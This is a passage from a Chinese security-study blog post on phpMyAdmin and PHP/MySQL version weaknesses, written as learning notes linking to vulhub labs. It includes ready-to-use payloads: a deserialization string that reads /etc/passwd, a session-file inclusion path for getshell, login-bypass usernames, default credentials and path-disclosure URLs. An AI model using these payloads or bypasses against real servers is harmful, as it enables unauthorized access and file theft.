<h3 id="堆叠注入Stack-Injection"><a href="#堆叠注入Stack-Injection" class="headerlink" title="堆叠注入Stack Injection"></a>堆叠注入Stack Injection</h3><p>PHP中堆叠注入的支持情况：</p>
<table>
<thead>
<tr>
<th align="left"></th>
<th align="left">Mysqli</th>
<th align="left">PDO</th>
<th align="left">MySQL</th>
</tr>
</thead>
<tbody><tr>
<td align="left">引入的PHP版本</td>
<td align="left">5.0</td>
<td align="left">5.0</td>
<td align="left">3.0之前</td>
</tr>
<tr>
<td align="left">PHP5.x是否包含</td>
<td align="left">是</td>
<td align="left">是</td>
<td align="left">是</td>
</tr>
<tr>
<td align="left">多语句执行支持情况</td>
<td align="left">是</td>
<td align="left">大多数</td>
<td align="left">否</td>
</tr>
</tbody></table>
<h1 id="phpmyadmin"><a href="#phpmyadmin" class="headerlink" title="phpmyadmin"></a>phpmyadmin</h1><ul>
<li>phpmyadmin2.x版本中存在一处反序列化漏洞，通过该漏洞，攻击者可以读取任意文件或执行任意代码。<ul>
<li>漏洞危害：无需登录，任意代码执行，任意文件读取</li>
<li>Payload: <code>action=test&amp;configuration=O:10:&quot;PMA_Config&quot;:1:&#123;s:6:&quot;source&quot;,s:11:&quot;/etc/passwd&quot;;&#125;</code></li>
</ul>
</li>
</ul>
<p>/scripts/setup.php</p>
<p><a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/phpmyadmin/WooYun-2016-199433/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/phpmyadmin/WooYun-2016-199433/README.zh-cn.md</a></p>
<p><a href="https://hack-for.fun/posts/d68d.html">https://hack-for.fun/posts/d68d.html</a></p>
<ul>
<li>Phpmyadmin <strong>4.0.x – 4.6.2</strong> RCE</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2016-5734/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2016-5734/README.zh-cn.md</a></p>
<p><a href="https://hack-for.fun/posts/8b82.html">https://hack-for.fun/posts/8b82.html</a></p>
<ul>
<li>Phpmyadmin<strong>4.8.1</strong> RFI</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2018-12613/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/phpmyadmin/CVE-2018-12613/README.zh-cn.md</a></p>
<p><a href="https://hack-for.fun/posts/ef94.html">https://hack-for.fun/posts/ef94.html</a></p>
<p>通过写入session, 然后包含session 文件进行getshell。</p>
<p>Payload:<code>index.php?target=db_sql.php%253f../../../../../tmp/sess_619cd5b47fc730f60a757f19ce6ea268</code></p>
<ul>
<li>phpmyadmin 通用密码漏洞</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">默认 phpMyAdmin：用户名 root、密码 root 或空登陆。</span><br><span class="line"></span><br><span class="line">版本 2.11.3～2.11.4：用户名 &#39;localhost&#39;@&#39;@&quot; 登陆，无需密码。</span><br><span class="line"></span><br><span class="line">版本 2.11.9.2：用户名 root 登陆，无需密码。</span><br></pre></td></tr></table></figure>

<ul>
<li>其他版本漏洞</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/aiquan9342/article/details/102075632">https://blog.csdn.net/aiquan9342/article/details/102075632</a></p>
<p>一： 影响版本：3.5.x &lt; 3.5.8.1 and 4.0.0 &lt; 4.0.0-rc3 ANYUN.ORG</p>
<blockquote>
<p>　　概述：PhpMyAdmin存在PREG<em>REPLACE</em>EVAL漏洞</p>
<p>　　利用模块：exploit/multi/http/phpmyadmin<em>preg</em>replace CVE: CVE-2013-3238</p>
</blockquote>
<p>二： 影响版本：phpMyAdmin v3.5.2.2</p>
<blockquote>
<p>　　概述：PhpMyAdmin存在server<em>sync.php 后门漏洞</em></p>
<p>　　<em>利用模块：exploit/multi/http/phpmyadmin</em>3522_backdoor CVE: CVE-2012-5159</p>
</blockquote>
<p>三： 影响版本： 2.11.x &lt; 2.11.9.5 and 3.x &lt; 3.1.3.1;</p>
<blockquote>
<p>　　概述：PhpMyAdmin配置文件/config/config.inc.php存在命令执行</p>
<p>　　利用模块：exploit/unix/webapp/phpmyadmin_config CVE: CVE-2009-1151</p>
</blockquote>
<p>四:影响版本：2.11.3 / 2.11.4</p>
<blockquote>
<p>　　利用方法：用户名处写入‘localhost’@‘@”则登录成功。 (注意全部是英文标点符号，最后一个为英文双引号)</p>
</blockquote>
<p>五:影响版本：2.8.0.3</p>
<p>　　phpmyadmin配合phpinfo getshell</p>
<p>　　<a target="_blank" rel="noopener" href="https://www.t00ls.net/thread-37889-1-1.html">https://www.t00ls.net/thread-37889-1-1.html</a></p>
<p>附上几个php爆绝对路径的办法：</p>
<blockquote>
<p>phpMyAdmin/libraries/select<em>lang.lib.php</em></p>
<p><em>phpMyAdmin/darkblue</em>orange/layout.inc.php phpMyAdmin/index.php?lang[]=1</p>
<p>phpmyadmin/themes/darkblue_orange/layout.inc.php</p>
</blockquote>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>特性很多，一篇文章肯定总结不过来。不过能总结一些还是好的，至少能够更加熟练。更重要的是，养成总结的习惯。</p>
<blockquote>
<p>不定期补充。</p>
</blockquote>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://hack-for.fun">m0nk3y</a>
            <p>原文链接：<a href="https://hack-for.fun/d8714939.html">https://hack-for.fun/d8714939.html</a>
            <p>发表日期：<a href="https://hack-for.fun/d8714939.html">August 25th 2020, 11:53:12 pm</a>
            <p>更新日期：<a href="https://hack-for.fun/d8714939.html">August 26th 2020, 9:49:08 am</a>
            <p>版权声明：<b>原创文章转载时请注明出处</b></p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/e42fccb.html" title= "常见端口服务漏洞">
                    <div class="nextTitle">常见端口服务漏洞</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/56cfbe5.html" title= "PHP CVE、ThinkPHP、PhpMyAdmin、PHP 安全学习笔记">
                    <div class="prevTitle">PHP CVE、ThinkPHP、PhpMyAdmin、PHP 安全学习笔记</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- gitalk评论 -->

    <!-- utteranc评论 -->

    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:ifonlysec@gmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
    
    <span id="busuanzi_container_site_uv">累计访客量: <span id="busuanzi_value_site_uv"></span> </span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PHP"><span class="toc-number">2.</span> <span class="toc-text">PHP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%98%E9%87%8F%E5%A4%84%E7%90%86%E6%9C%BA%E5%88%B6"><span class="toc-number">2.1.</span> <span class="toc-text">变量处理机制</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#list"><span class="toc-number">2.2.</span> <span class="toc-text">list()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#foreach"><span class="toc-number">2.3.</span> <span class="toc-text">foreach()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E5%A4%84%E7%90%86%E6%9C%BA%E5%88%B6"><span class="toc-number">2.4.</span> <span class="toc-text">参数处理机制</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B4%E6%95%B0%E5%A4%84%E7%90%86%E6%9C%BA%E5%88%B6%E4%BF%AE%E6%94%B9"><span class="toc-number">2.5.</span> <span class="toc-text">整数处理机制修改</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%A4%84%E7%90%86%E6%9C%BA%E5%88%B6%E4%BF%AE%E6%94%B9"><span class="toc-number">2.6.</span> <span class="toc-text">字符串处理机制修改</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E4%BF%AE%E6%94%B9"><span class="toc-number">2.7.</span> <span class="toc-text">其他修改</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MYSQL"><span class="toc-number">3.</span> <span class="toc-text">MYSQL</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">4.</span> <span class="toc-text">漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE"><span class="toc-number">4.1.</span> <span class="toc-text">RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#eval"><span class="toc-number">4.1.1.</span> <span class="toc-text">eval</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#assert"><span class="toc-number">4.1.2.</span> <span class="toc-text">assert</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#disable-function"><span class="toc-number">4.1.3.</span> <span class="toc-text">disable_function</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Php-7-0-7-3-bypass"><span class="toc-number">4.1.3.1.</span> <span class="toc-text">Php 7.0-7.3 bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#LD-PRELOAD-%E5%8A%AB%E6%8C%81"><span class="toc-number">4.1.3.2.</span> <span class="toc-text">LD_PRELOAD 劫持</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ImageMagick-vuln-bypass"><span class="toc-number">4.1.3.3.</span> <span class="toc-text">ImageMagick vuln bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Mod-cgi"><span class="toc-number">4.1.3.4.</span> <span class="toc-text">Mod_cgi</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Windows-%E7%B3%BB%E7%BB%9F%E7%BB%84%E4%BB%B6-COM"><span class="toc-number">4.1.3.5.</span> <span class="toc-text">Windows 系统组件 COM</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PHP-7-4-FFI-Bypass"><span class="toc-number">4.1.3.6.</span> <span class="toc-text">PHP 7.4 FFI Bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Bash-ShellShock"><span class="toc-number">4.1.3.7.</span> <span class="toc-text">Bash ShellShock</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AF%BB%E6%89%BE%E6%BC%8F%E7%BD%91%E4%B9%8B%E9%B1%BC"><span class="toc-number">4.1.3.8.</span> <span class="toc-text">寻找漏网之鱼</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XXE-PHP-7-0-30"><span class="toc-number">4.2.</span> <span class="toc-text">XXE - PHP 7.0.30</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unserialize-serialize"><span class="toc-number">4.3.</span> <span class="toc-text">unserialize&#x2F;serialize</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL-Injection"><span class="toc-number">4.4.</span> <span class="toc-text">SQL Injection</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Mysql-lt-5-0-%E9%9D%A2%E8%AF%95%E5%B8%B8%E9%97%AE"><span class="toc-number">4.4.1.</span> <span class="toc-text">Mysql &lt; 5.0(面试常问)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mysql-gt-5-0%EF%BC%88%E9%9D%A2%E8%AF%95%E5%B8%B8%E9%97%AE"><span class="toc-number">4.4.2.</span> <span class="toc-text">Mysql &gt;&#x3D; 5.0（面试常问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp-pow-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">4.4.3.</span> <span class="toc-text">exp()&#x2F;pow() 报错注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#updatexml-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">4.4.4.</span> <span class="toc-text">updatexml() 报错注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#extractvalue"><span class="toc-number">4.4.5.</span> <span class="toc-text">extractvalue()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99"><span class="toc-number">4.4.6.</span> <span class="toc-text">文件读写</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5Stack-Injection"><span class="toc-number">4.4.7.</span> <span class="toc-text">堆叠注入Stack Injection</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#phpmyadmin"><span class="toc-number">5.</span> <span class="toc-text">phpmyadmin</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">6.</span> <span class="toc-text">总结</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 22
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/23</span><a class="archive-post-title" href= "/a45.html" >ThinkPHP5漏洞学习-RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/22</span><a class="archive-post-title" href= "/5dcc.html" >CSS 注入学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/21</span><a class="archive-post-title" href= "/0.html" >《透视APT》读书笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/8d0f.html" >ThinkPHP5漏洞学习-文件包含漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/13</span><a class="archive-post-title" href= "/69fea760.html" >ThinkPHP5漏洞学习-SQL注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/12</span><a class="archive-post-title" href= "/844d1b07.html" >新秀企业网站系统代码审计学习(复现)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/11</span><a class="archive-post-title" href= "/4fd81e40.html" >MacOS 下配置PHP代码审计环境，PHP调试学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/11</span><a class="archive-post-title" href= "/66043e4c.html" >WAF Bypass 姿势总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/09</span><a class="archive-post-title" href= "/fb2051a0.html" >CTF-XSS</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/936f84c6.html" >CTF-SSTI</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/54449ea6.html" >Windows 服务器应急响应</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/04</span><a class="archive-post-title" href= "/e312198e.html" >Linux 服务器应急响应</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/03</span><a class="archive-post-title" href= "/7881c78e.html" >CTF - 文件包含</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span><a class="archive-post-title" href= "/dbb484a9.html" >CTF - RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span><a class="archive-post-title" href= "/103ec22a.html" >CTF - 文件上传</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/29</span><a class="archive-post-title" href= "/bc077bb7.html" >HTTP request smuggling(请求走私)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/27</span><a class="archive-post-title" href= "/a4738b93.html" >CTF Tricks 总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/13bb2df2.html" >iptables 学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/c10c5ca9.html" >Redis 安全学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/e42fccb.html" >常见端口服务漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/25</span><a class="archive-post-title" href= "/56cfbe5.html" >PHP CVE、ThinkPHP、PhpMyAdmin、PHP 安全学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/25</span><a class="archive-post-title" href= "/d8714939.html" >PHP以及MYSQL相关版本差异及对应的安全问</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="渗透测试"><span class="iconfont-archer">&#xe606;</span>渗透测试</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="SSTI"><span class="iconfont-archer">&#xe606;</span>SSTI</span>
    
        <span class="sidebar-tag-name" data-tags="协议层安全"><span class="iconfont-archer">&#xe606;</span>协议层安全</span>
    
        <span class="sidebar-tag-name" data-tags="PHP安全"><span class="iconfont-archer">&#xe606;</span>PHP安全</span>
    
        <span class="sidebar-tag-name" data-tags="代码审计"><span class="iconfont-archer">&#xe606;</span>代码审计</span>
    
        <span class="sidebar-tag-name" data-tags="文件包含"><span class="iconfont-archer">&#xe606;</span>文件包含</span>
    
        <span class="sidebar-tag-name" data-tags="Linux应急响应"><span class="iconfont-archer">&#xe606;</span>Linux应急响应</span>
    
        <span class="sidebar-tag-name" data-tags="端口"><span class="iconfont-archer">&#xe606;</span>端口</span>
    
        <span class="sidebar-tag-name" data-tags="漏洞挖掘"><span class="iconfont-archer">&#xe606;</span>漏洞挖掘</span>
    
        <span class="sidebar-tag-name" data-tags="SQL注入"><span class="iconfont-archer">&#xe606;</span>SQL注入</span>
    
        <span class="sidebar-tag-name" data-tags="iptables"><span class="iconfont-archer">&#xe606;</span>iptables</span>
    
        <span class="sidebar-tag-name" data-tags="APT"><span class="iconfont-archer">&#xe606;</span>APT</span>
    
        <span class="sidebar-tag-name" data-tags="RCE"><span class="iconfont-archer">&#xe606;</span>RCE</span>
    
        <span class="sidebar-tag-name" data-tags="Redis"><span class="iconfont-archer">&#xe606;</span>Redis</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="渗透测试"><span class="iconfont-archer">&#xe60a;</span>渗透测试</span>
    
        <span class="sidebar-category-name" data-categories="运维知识"><span class="iconfont-archer">&#xe60a;</span>运维知识</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "m0nk3y"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


